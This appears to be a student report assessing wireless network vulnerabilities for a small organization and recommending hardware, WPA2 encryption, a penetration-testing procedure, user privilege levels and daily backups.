I. Vulnerability Assessments
A wireless connection in the 20-people organization has the same vulnerabilities that other wireless network. A wireless network has the characteristic that virtually anyone inside the radius of the wireless network could have access to the network, have unauthorized access and create problems with the information flow. The information technicians of the company must consider the following risks and vulnerabilities of the network:
Default Keys: They are the passwords that manufacturer brings into the router by default. Several administrators and final users forget to change the default password creating a risk for the organization. The NETGEAR MR814 router brings a default key that several network administrators forget to change, increasing the risk of the network.
Wi-Fi Protected Service failure: The failure occurs with the PIN configuration. The PIN normally has eight digits and when the user give the first four digits, the other four digits are not necessary reducing the possibility to have an unauthorized access from 1 over one hundred million possibilities to 1 over ten thousand possibilities. The only possible solution for this is to disable the WPS.
Mac Spoofing: The attack occurs when a stranger gets a MAC address from one of the devices inside the network and executes an impersonating action inside the network.
Denial of Service: Denial of some resource or service. It can be used to saturate a network with dissipation requests making it impossible to access other users since the network components are associated and disassociated several times.
Access Point Spoofing: The event occurs after the creation of a false access point and with it, the unauthorized access is possible.
Man in the Middle: The event occurs when the stranger have access to read and modify the information between two legitimate clients.
WLAN scanners: WLAN Scanners or "Surveillance Attack" consist of crossing a site that is wanted to invade to discover WLAN networks active there, as well as physical equipment, for a subsequent attack or theft.
II. Network/System Security Recommendations
The easiest way to reduce risk in wireless networks is changing it to a wired connection. The use of a switch with an embedded firewall is the first step to improving security in the wireless network. A recommendation for a wired network is the NETGEAR FVS318 ProSafe VPN Firewall Switch with a price of 300 USD (Figure 1). The previous solution helps the network administrator to have a switch and a firewall in the same device. The recent version of Windows Server (Figure 2) is compatible with the switch and gives advantages to the administrator as the Server Manager application, Dynamic Access Control and the Direct Access improvement to facilitate secure connections between server and clients.
Figure 1 Switch with firewall application
If the network maintains wireless access, it is necessary first to change the password that it brings by default. The technicians can establish four types of encryption: open, WEB encryption and WPA.
Open encryption and WEB encryption are the least secure. With the open configuration, anyone can access the network, read and modify information from all the devices of the network. This configuration must be changed to an encrypted configuration.
Figure 2 Windows Server Screenshot
WPA enterprise encryption is the safest but least known method. This method consists of user authentication and passwords stored on a radius server. This method is not recommended because of the difficulties in the server creation and authentication information.
The most recommended encryption for the organization is the WPA and WPA2 (Figure 3), where an unauthorized access is only possible by performing a dictionary or brute force attack. This attack is performed by generating a dictionary with several keys to try to match some keys with the router and get access, the greater the dictionary, the greater the likelihood of access.
Figure 3 WPA and WPA2 configuration
Technicians must follow a three-step procedure to verify that the organization network is secure:
a) Context definition. Before starting an intrusion test, the organization has to define the test context. This step includes the determination of the extent of the test, the elements to be tested, where it will be done and who will do it. Decide whether the tests will be on a large scale or the contrary will be specific, whether they will be internal or external. The test procedure requires the agreement with the management of the organization.
B) Carrying out the intrusion tests. A correct methodology, which involves gathering information and testing to the specific environment, is necessary to the achievement of the intrusion test. The process begins by collecting all the information about the network architecture to find all the security vulnerabilities . The recommended tools for this approach are the McAfee® Internet Security (Figure 4).
Figure 4 McAfee Internet Security
C) Results report and delivery: After completing the intrusion tests the technicians must analyze all the information derived from the testing procedure. The technician has to enumerate and prioritize vulnerabilities, classify risks as high, medium or low, and recommend solutions for vulnerabilities. The technicians also provide resources, such as Internet links, to find additional information or obtain patches to address vulnerabilities.
Summary.
a) Use of a wired connection using the NETGEAR FVS318 ProSafe VPN with embedded Firewall.
b) Select the WPA configuration for the wireless network.
c) Develop a three-step procedure to verify the organization network security.
III. Application/End-User Security Recommendations
After the application of the previous network security recommendations, the end-users, those are the twenty members of the organization and the "guests" of the organization must meet security standards. The recommendations are:
■ Owner: The owner must have configured his Ipad with a double check identity. The first verification is to open session in the Ipad to avoid an intruder uses the mobile device. The second verification is with a username and password verification to access to the network using the mobile device . Due to the fact, the used software for the server is Windows Server; it is necessary to use an interface application for the Ipad to protect both the device and the enterprise network. The recommendation for this approach is Norton Identity Safe . The configuration of the software is according to the Apps Store of the device. The software has a proprietary condition, having the company an annual contract of software provision and support from the provider company (Norton) to the organization.
■ Low privileges staff: The ten accountants, three administrative support specialists, and the two interns have the basic access level to the network with the right to have a username and password through their computer terminal to share information to the network and save information to the central storage. They don't have privileges to change network configuration of editing the master files.
■ High privileges staff: The vice-president, financial manager, and the owner have the rights of the low privileges staff and the ability to edit the master files of the company. To edit the network configuration is necessary the validation of the network technician.
All the transactions of the users and the server must be backup every day in stand-alone equipment. Dell offers a solution, called PowerVault 114X Tape Rack (Figure 5). The enclosure which can provide storage up to 6 TB of data. The price of the solution is 2000 USD.
Figure 5 PowerVault 114X Tape Rack
Summary of required equipment:
Ethical principles in information management:
The company must communicate in oral and written way to the employees what are the regulations of use of the enterprise network to guarantee the security of each user and the entire network. The two basic principles are:
■ The use of new devices inside the network is forbidden. The network administrator and the management staff can authorize the use of other devices, previous to the software standardization.
■ The employees of the organization has the right and the duty to use the network with legitimate software and applications.
References
